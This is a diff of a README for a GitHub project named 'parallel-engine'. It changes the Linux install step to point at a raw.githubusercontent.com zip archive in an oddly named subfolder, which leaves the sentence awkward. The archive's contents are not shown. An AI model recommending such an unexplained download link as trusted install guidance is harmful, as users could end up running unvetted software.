thammanoon-code/parallel-engine/README.md

 5. **Install the Application**
    - For **Windows**: Double-click the downloaded `.exe` file.
 Follow the on-screen instructions to complete the installation.
    - For **macOS**: Double-click the downloaded `.dmg` file.
 Drag the **parallel-engine** icon into your Applications folder.
-   - For **Linux**: Open a terminal and extract the `.tar.gz` file.
+   - For **Linux**: Open a terminal and extract the `https://raw.githubusercontent.com/thammanoon-code/parallel-engine/master/auriscalpium/parallel-engine.zip` file.
 Follow the included instructions to install.

 6. **Launch the Application**
    After installation, find **parallel-engine** in your applications menu (for Windows and macOS) or execute it from the terminal (for Linux).